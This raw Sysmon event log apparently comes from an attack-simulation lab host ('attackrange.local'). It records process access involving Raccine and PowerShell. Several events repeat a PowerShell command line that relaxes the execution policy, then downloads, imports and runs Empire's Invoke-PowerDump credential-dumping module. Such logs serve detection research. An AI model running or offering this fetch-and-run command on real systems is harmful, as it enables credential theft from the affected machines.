Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002163795Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.511{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002163794Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.509{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-4905-010000000E02}808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+57ef|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002163793Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.506{9DBE88B5-3BB7-61B2-4805-010000000E02}6612ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002163792Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.499{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-4905-010000000E02}808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1c3aC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+c6f00|C:\Windows\System32\KERNELBASE.dll+c6e21|C:\Program Files\Raccine\Raccine.exe+1876|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002163786Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.498{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-4905-010000000E02}808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+1848|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002163785Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.496{9DBE88B5-3BB7-61B2-4905-010000000E02}808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002163784Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.485{9DBE88B5-3AAE-61AE-0EA8-000000000E02}68046848C:\Windows\system32\conhost.exe{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002163783Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.482{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c01f5|UNKNOWN(00007FF9867AB323) 10341000x80000000000000002163782Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.479{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002163777Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.478{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\207926782604047fb43c0980a31be783\Microsoft.PowerShell.Commands.Management.ni.dll+8657f278(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\207926782604047fb43c0980a31be783\Microsoft.PowerShell.Commands.Management.ni.dll+8657f278(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\207926782604047fb43c0980a31be783\Microsoft.PowerShell.Commands.Management.ni.dll+8657f278(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\207926782604047fb43c0980a31be783\Microsoft.PowerShell.Commands.Management.ni.dll+8657f278(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e2995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e27fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c986b92d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97daa82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab304(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97a002a(wow64)|UNKNOWN(00007FF9867DC5C8) 154100x80000000000000002163776Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.475{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe1.4.2.0 BETAA Simple Ransomware Vaccine - see https://github.com/Neo23x0/RaccineRaccineRaccineRaccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=287F6CFBFFD83B75A0F8F749B0F636F3,SHA256=E5364CE4BD1814E003215BFF10DD2F191C33199260DFD2688D4F6CCE4A7C75B8,IMPHASH=B9673CBFF2550CFBFA1668EF53412C24{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x80000000000000002163221Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:23:45.419{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002163134Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:23:45.349{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002163049Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:23:45.286{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002162953Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:23:45.219{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002162869Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:23:45.158{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002162775Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:23:45.085{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002162667Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:23:45.018{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002130900Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:39:06.403{9DBE88B5-30EE-61B2-E103-010000000E02}78128080C:\Windows\SysWOW64\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+10f5f9(wow64)|UNKNOWN(000000000066860F)|UNKNOWN(0000000000667FA0)|UNKNOWN(00000000006614E3)|UNKNOWN(0000000000668841)|UNKNOWN(0000000000676170)|UNKNOWN(0000000000676218)|UNKNOWN(0000000000190024)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64) 10341000x80000000000000002130899Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:39:06.403{9DBE88B5-30EE-61B2-E103-010000000E02}78128080C:\Windows\SysWOW64\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69d8(wow64)|UNKNOWN(00000000006685BA)|UNKNOWN(0000000000667FA0)|UNKNOWN(00000000006614E3)|UNKNOWN(0000000000668841)|UNKNOWN(0000000000676170)|UNKNOWN(0000000000676218)|UNKNOWN(0000000000190024)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64) 10341000x80000000000000002123260Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123259Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123258Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123257Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123256Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123255Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123254Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123253Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.423{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 